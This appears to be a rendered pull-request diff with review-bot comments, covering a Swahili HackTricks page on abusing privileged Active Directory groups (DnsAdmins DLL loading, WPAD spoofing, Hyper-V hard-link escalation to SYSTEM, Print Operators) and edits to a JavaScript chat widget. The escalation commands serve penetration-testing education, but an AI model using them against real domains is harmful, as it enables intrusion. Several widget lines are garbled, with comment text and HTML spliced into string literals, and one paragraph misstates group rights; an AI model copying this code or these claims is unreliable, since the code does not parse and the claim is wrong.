Kuanza upya huduma ya DNS (ambayo inaweza kuhitaji ruhusa za ziada) inahitajika ili DLL ipakwe:
```csharp
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
```
Kwa maelezo zaidi kuhusu njia hii ya shambulio, rejelea ired.team.
Kwa maelezo zaidi kuhusu vektori hii ya shambulio, rejea ired.team.
#### Mimilib.dll
Pia inawezekana kutumia mimilib.dll kwa ajili ya utekelezaji wa amri, kuibadilisha ili kutekeleza amri maalum au shells za kurudi. [Check this post](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) kwa maelezo zaidi.
Inawezekana pia kutumia mimilib.dll kwa utekelezaji wa amri, ukibadilisha ili kutekeleza amri maalum au reverse shells. [Check this post](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) kwa maelezo zaidi.
### WPAD Record kwa MitM
### WPAD Rekodi kwa MitM
DnsAdmins wanaweza kubadilisha rekodi za DNS ili kufanya shambulio la Man-in-the-Middle (MitM) kwa kuunda rekodi ya WPAD baada ya kuzima orodha ya kuzuia maswali ya kimataifa. Zana kama Responder au Inveigh zinaweza kutumika kwa ajili ya kudanganya na kukamata trafiki ya mtandao.
DnsAdmins wanaweza kuathiri rekodi za DNS ili kufanya shambulio za Man-in-the-Middle (MitM) kwa kuunda rekodi ya WPAD baada ya kuzima global query block list. Zana kama Responder au Inveigh zinaweza kutumika kwa spoofing na kukamata trafiki ya mtandao.
### Wasilishi wa Kumbukumbu za Matukio
Wajumbe wanaweza kufikia kumbukumbu za matukio, huenda wakapata taarifa nyeti kama nywila za maandiko au maelezo ya utekelezaji wa amri:
### Wasomaji wa logi za matukio
Wanachama wanaweza kufikia logi za matukio, kwa uwezekano kupata taarifa nyeti kama nywila za maandishi wazi (plaintext) au maelezo ya utekelezaji wa amri:
```bash
# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
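Review bot: The heading "Wasomaji wa logi za matukio" translates the group name, but the command two lines later uses the identifier `"Event Log Readers"`; group names are AD object names and should stay verbatim in headings (as "DnsAdmins" and "Hyper-V Administrators" do elsewhere in this file). Also, the `sc.exe \\dc01 stop dns` / `start dns` block is fenced as ```csharp, which mislabels a cmd snippet; use `cmd`.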
@ -182,66 +197,70 @@ Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Va
```
## Exchange Windows Permissions
Kikundi hiki kinaweza kubadilisha DACLs kwenye kituo cha kikoa, huenda kikatoa ruhusa za DCSync. Mbinu za kupandisha hadhi zinazotumia kikundi hiki zimeelezewa katika repo ya Exchange-AD-Privesc ya GitHub.
Kikundi hiki kinaweza kubadilisha DACLs kwenye domain object, na hivyo kuweza kutoa ruhusa za DCSync. Mbinu za privilege escalation zinazotumia kikundi hiki zimetajwa kwa undani kwenye Exchange-AD-Privesc GitHub repo.
```bash
# List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
```
## Wataalam wa Hyper-V
## Hyper-V Administrators
Wataalam wa Hyper-V wana ufikiaji kamili wa Hyper-V, ambayo inaweza kutumika kuteka udhibiti wa Wasimamizi wa Kikoa wa virtual. Hii inajumuisha kunakili DCs za moja kwa moja na kutoa NTLM hashes kutoka kwa faili ya NTDS.dit.
Hyper-V Administrators wana upatikanaji kamili wa Hyper-V, ambao unaweza kutumika kupata udhibiti wa Domain Controllers zilizovirtualishwa. Hii inajumuisha cloning ya live DCs na kutoa NTLM hashes kutoka kwa faili NTDS.dit.
### Mfano wa Kutumia
### Exploitation Example
Huduma ya Matengenezo ya Mozilla ya Firefox inaweza kutumika na Wataalam wa Hyper-V kutekeleza amri kama SYSTEM. Hii inahusisha kuunda kiungo kigumu kwa faili ya SYSTEM iliyo na ulinzi na kuibadilisha na executable mbaya:
Firefox's Mozilla Maintenance Service inaweza kutumika na Hyper-V Administrators kutekeleza amri kama SYSTEM. Hii inahusisha kuunda hard link kwa faili ya SYSTEM iliyo na ulinzi na kuibadilisha kwa executable hatarishi:
```bash
# Take ownership and start the service
takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
sc.exe start MozillaMaintenance
```
Note: Utekelezaji wa kiungo kigumu umepunguziliwa mbali katika sasisho za hivi karibuni za Windows.
Note: Hard link exploitation imepunguzwa katika masasisho ya hivi karibuni ya Windows.
## Usimamizi wa Shirika
## Group Policy Creators Owners
Katika mazingira ambapo **Microsoft Exchange** imewekwa, kundi maalum linalojulikana kama **Usimamizi wa Shirika** lina uwezo mkubwa. Kundi hili lina haki ya **kufikia sanduku la barua la watumiaji wote wa kikoa** na lina **udhibiti kamili juu ya 'Makundi ya Usalama ya Microsoft Exchange'** Kitengo cha Shirika (OU). Udhibiti huu unajumuisha kundi la **`Exchange Windows Permissions`**, ambalo linaweza kutumika kwa ajili ya kupandisha hadhi.
Kikundi hiki kinawawezesha wanachama kuunda Group Policies katika domain. Hata hivyo, wanachama wake hawawezi apply group policies kwa watumiaji au vikundi au kuhariri GPOs zilizopo.
### Utekelezaji wa Haki na Amri
## Organization Management
#### Opereta wa Print
Katika mazingira ambapo **Microsoft Exchange** imewekwa, kikundi maalum kinachojulikana kama **Organization Management** kina uwezo mkubwa. Kikundi hiki kina haki ya **access the mailboxes of all domain users** na kinahifadhi **full control over the 'Microsoft Exchange Security Groups'** Organizational Unit (OU). Udhibiti huu unajumuisha kikundi cha **`Exchange Windows Permissions`**, ambacho kinaweza kutumika kwa privilege escalation.
Wajumbe wa kundi la **Opereta wa Print** wanapewa haki kadhaa, ikiwa ni pamoja na **`SeLoadDriverPrivilege`**, ambayo inawaruhusu **kuingia kwa ndani kwenye Kidhibiti cha Kikoa**, kuifunga, na kusimamia printa. Ili kutumia haki hizi, hasa ikiwa **`SeLoadDriverPrivilege`** haionekani chini ya muktadha usio na hadhi, kupita Udhibiti wa Akaunti ya Mtumiaji (UAC) ni muhimu.
### Privilege Exploitation and Commands
Ili kuorodhesha wajumbe wa kundi hili, amri ifuatayo ya PowerShell inatumika:
#### Print Operators
Wanachama wa **Print Operators** wamepewa haki kadhaa, ikiwemo **`SeLoadDriverPrivilege`**, ambayo inawawezesha **log on locally to a Domain Controller**, kuizima, na kusimamia printers. Ili kutekeleza misingi ya haki hizi, hasa ikiwa **`SeLoadDriverPrivilege`** haionekani chini ya muktadha usio na elevation, ni lazima kupitisha User Account Control (UAC).
Ili kuorodhesha wanachama wa kikundi hiki, amri ya PowerShell ifuatayo inatumika:
```bash
Get-NetGroupMember -Identity "Print Operators" -Recurse
```
Kwa mbinu za kina za unyakuzi zinazohusiana na **`SeLoadDriverPrivilege`**, mtu anapaswa kutafuta rasilimali maalum za usalama.
Kwa mbinu za kina za exploitation zinazohusiana na **`SeLoadDriverPrivilege`**, tafuta rasilimali maalum za usalama.
#### Watumiaji wa Desktop ya Kijijini
#### Watumiaji wa Remote Desktop
Wajumbe wa kundi hili wanapewa ufikiaji wa PCs kupitia Protokali ya Desktop ya Kijijini (RDP). Ili kuhesabu wajumbe hawa, amri za PowerShell zinapatikana:
Wanachama wa kikundi hiki wanapewa upatikanaji wa PC kupitia Remote Desktop Protocol (RDP). Ili kuorodhesha wanachama hawa, amri za PowerShell zinapatikana:
```bash
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
```
Maelezo zaidi kuhusu kutumia RDP yanaweza kupatikana katika rasilimali maalum za pentesting.
Maelezo zaidi kuhusu exploiting RDP yanaweza kupatikana katika rasilimali maalum za pentesting.
#### Watumiaji wa Usimamizi wa Kijijini
#### Watumiaji wa Usimamizi wa Mbali
Wajumbe wanaweza kufikia PCs kupitia **Windows Remote Management (WinRM)**. Uhesabu wa wajumbe hawa unafanywa kupitia:
Wanachama wanaweza kufikia PC kupitia **Windows Remote Management (WinRM)**. Uorodheshaji wa wanachama hawa unafanywa kupitia:
```bash
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
```
Kwa mbinu za unyakuzi zinazohusiana na **WinRM**, nyaraka maalum zinapaswa kutumika.
Kwa exploitation techniques zinazohusiana na **WinRM**, inashauriwa kushauriana na nyaraka maalum.
#### Watoa Huduma wa Seva
#### Server Operators
Kikundi hiki kina ruhusa za kufanya usanidi mbalimbali kwenye Wasimamizi wa Kikoa, ikiwa ni pamoja na ruhusa za kuhifadhi na kurejesha, kubadilisha muda wa mfumo, na kuzima mfumo. Ili kuhesabu wanachama, amri iliyotolewa ni:
Kikundi hiki kina ruhusa za kufanya usanidi mbalimbali kwenye Domain Controllers, ikiwa ni pamoja na ruhusa za kuhifadhi nakala na kurejesha (backup/restore), kubadilisha saa ya mfumo, na kuzima mfumo. Ili kuorodhesha wanachama, amri iliyotolewa ni:
```bash
Get-NetGroupMember -Identity "Server Operators" -Recurse
```
## References <a href="#references" id="references"></a>
## Marejeo <a href="#references" id="references"></a>
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
- [https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
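Review bot: The new section is titled "Group Policy Creators Owners", but the built-in group is "Group Policy Creator Owners" (singular), and the claim that members cannot edit existing GPOs is too strong: the creator of a GPO gets full control over that GPO, so members can edit the GPOs they themselves created; what they lack is the right to link GPOs to sites, domains or OUs unless that right is delegated separately. Restate the paragraph accordingly. Two smaller points in the same hunk: `takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe` will fail because the path with spaces is unquoted; and the headings "Watumiaji wa Remote Desktop" and "Watumiaji wa Usimamizi wa Mbali" translate group names while "Print Operators" and "Server Operators" keep them, so the same keep-identifiers-verbatim rule applies.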
@ -257,6 +276,7 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse
- [https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys)
- [https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e)
- [https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html](https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html)
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -5,7 +5,10 @@
(() => {
const KEY = 'htSummerDiscountsDismissed';
const IMG = '/images/discount.jpeg';
const IMG = '/ima * HackTricks AI Chat Widget v1.17 enhanced resizable sidebar
* ---------------------------------------------------
* Markdown rendering + sanitised (same as before)
* ENHANCED: improved dragtoresize panel with better UXdiscount.jpeg';
const TXT = 'Click here for HT Summer Discounts, Last Days!';
const URL = 'https://training.hacktricks.xyz';
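Review bot: As rendered, the changed `const IMG = '/ima * HackTricks AI Chat Widget v1.17 enhanced resizable sidebar ... UXdiscount.jpeg';` line contains what looks like a comment banner from the AI chat widget spliced into the middle of the string literal, which would be an unterminated string and a syntax error. Please confirm whether this is the actual file content or a display artefact of the rendered diff; if it is real, restore `const IMG = '/images/discount.jpeg';` and put the banner back in its own `/* ... */` comment.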
@ -13,7 +16,20 @@
if (localStorage.getItem(KEY) === 'true') return;
// Quick helper
const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css });
const $ = (tag, css = '') => Object.assign(document.cr p.innerHTML = `
<div id="ht-ai-header">
<strong>HackTricks AI Chat</strong>
<span style="font-size:11px;opacity:0.6;margin-left:8px;"> Drag edge to resize</span>
<div class="ht-actions">
<button id="ht-ai-reset" title="Reset"></button>
<span id="ht-ai-close" title="Close"></span>
</div>
</div>
<div id="ht-ai-chat"></div>
<div id="ht-ai-input">
<textarea id="ht-ai-question" placeholder="Type your question…"></textarea>
<button id="ht-ai-send">Send</button>
</div>`;tag), { style: css });
// --- Overlay (blur + dim) ---
const overlay = $('div', `
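Review bot: Same problem here: the `$` helper line appears as `const $ = (tag, css = '') => Object.assign(document.cr p.innerHTML = \`...\`;tag), { style: css });`, with the `p.innerHTML` template (header, chat, input) inserted inside the `document.createElement(` call. If this is the committed text the file does not parse; the helper should stay `Object.assign(document.createElement(tag), { style: css })` and the `p.innerHTML = ...` assignment belongs where the panel element is built.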
@ -111,7 +127,7 @@
const MAX_CONTEXT = 3000; // highlightedtext char limit
const MAX_QUESTION = 500; // question char limit
const MIN_W = 250; // ← resize limits →
const MAX_W = 600;
const MAX_W = 800;
const DEF_W = 350; // default width (if nothing saved)
const TOOLTIP_TEXT =
"💡 Highlight any text on the page,\nthen click to ask HackTricks AI about it";
@ -345,8 +361,9 @@
#ht-ai-panel{position:fixed;top:0;right:0;height:100%;max-width:90vw;background:#000;color:#fff;display:flex;flex-direction:column;transform:translateX(100%);transition:transform .3s ease;z-index:100000;font-family:system-ui,-apple-system,Segoe UI,Roboto,"Helvetica Neue",Arial,sans-serif}
#ht-ai-panel.open{transform:translateX(0)}
@media(max-width:768px){#ht-ai-panel{display:none}}
#ht-ai-header{display:flex;justify-content:space-between;align-items:center;padding:12px 16px;border-bottom:1px solid #333}
#ht-ai-header .ht-actions{display:flex;gap:8px;align-items:center}
#ht-ai-header{display:flex;justify-content:space-between;align-items:center;padding:12px 16px;border-bottom:1px solid #333;flex-wrap:wrap}
#ht-ai-header strong{flex-shrink:0}
#ht-ai-header .ht-actions{display:flex;gap:8px;align-items:center;margin-left:auto}
#ht-ai-close,#ht-ai-reset{cursor:pointer;font-size:18px;background:none;border:none;color:#fff;padding:0}
#ht-ai-close:hover,#ht-ai-reset:hover{opacity:.7}
#ht-ai-chat{flex:1;overflow-y:auto;padding:16px;display:flex;flex-direction:column;gap:12px;font-size:14px}
@ -367,8 +384,10 @@
::selection{background:#ffeb3b;color:#000}
::-moz-selection{background:#ffeb3b;color:#000}
/* NEW: resizer handle */
#ht-ai-resizer{position:absolute;left:0;top:0;width:6px;height:100%;cursor:ew-resize;background:transparent}
#ht-ai-resizer:hover{background:rgba(255,255,255,.05)}`;
#ht-ai-resizer{position:absolute;left:0;top:0;width:8px;height:100%;cursor:ew-resize;background:rgba(255,255,255,.08);border-right:1px solid rgba(255,255,255,.15);transition:background .2s ease}
#ht-ai-resizer:hover{background:rgba(255,255,255,.15);border-right:1px solid rgba(255,255,255,.3)}
#ht-ai-resizer:active{background:rgba(255,255,255,.25)}
#ht-ai-resizer::before{content:'';position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);width:2px;height:20px;background:rgba(255,255,255,.4);border-radius:1px}`;
const s = document.createElement("style");
s.id = "ht-ai-style";
s.textContent = css;
@ -432,24 +451,43 @@
const onMove = (e) => {
if (!dragging) return;
const dx = startX - e.clientX; // dragging leftwards ⇒ +dx
e.preventDefault();
const clientX = e.clientX || (e.touches && e.touches[0].clientX);
const dx = startX - clientX; // dragging leftwards ⇒ +dx
let newW = startW + dx;
newW = Math.min(Math.max(newW, MIN_W), MAX_W);
panel.style.width = newW + "px";
};
const onUp = () => {
if (!dragging) return;
dragging = false;
handle.style.background = "";
document.body.style.userSelect = "";
document.body.style.cursor = "";
localStorage.setItem("htAiWidth", parseInt(panel.style.width, 10));
document.removeEventListener("mousemove", onMove);
document.removeEventListener("mouseup", onUp);
document.removeEventListener("touchmove", onMove);
document.removeEventListener("touchend", onUp);
};
handle.addEventListener("mousedown", (e) => {
const onStart = (e) => {
e.preventDefault();
dragging = true;
startX = e.clientX;
startX = e.clientX || (e.touches && e.touches[0].clientX);
startW = parseInt(window.getComputedStyle(panel).width, 10);
handle.style.background = "rgba(255,255,255,.25)";
document.body.style.userSelect = "none";
document.body.style.cursor = "ew-resize";
document.addEventListener("mousemove", onMove);
document.addEventListener("mouseup", onUp);
});
document.addEventListener("touchmove", onMove, { passive: false });
document.addEventListener("touchend", onUp);
};
handle.addEventListener("mousedown", onStart);
handle.addEventListener("touchstart", onStart, { passive: false });
}
})();
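Review bot: `const clientX = e.clientX || (e.touches && e.touches[0].clientX);` (used in both `onMove` and `onStart`) treats a mouse position of 0 as missing: when `e.clientX` is 0 the expression falls through to `e.touches`, which is undefined for mouse events, so `clientX` becomes undefined and `newW` is `NaN`, and `panel.style.width = "NaNpx"` is silently ignored. Branch on event type instead, e.g. `const clientX = e.touches ? e.touches[0].clientX : e.clientX;`. The rest of the touch wiring is fine: `touchstart`/`touchmove` are registered with `{ passive: false }` so the `preventDefault()` calls are honoured, and `removeEventListener` does not need the options object.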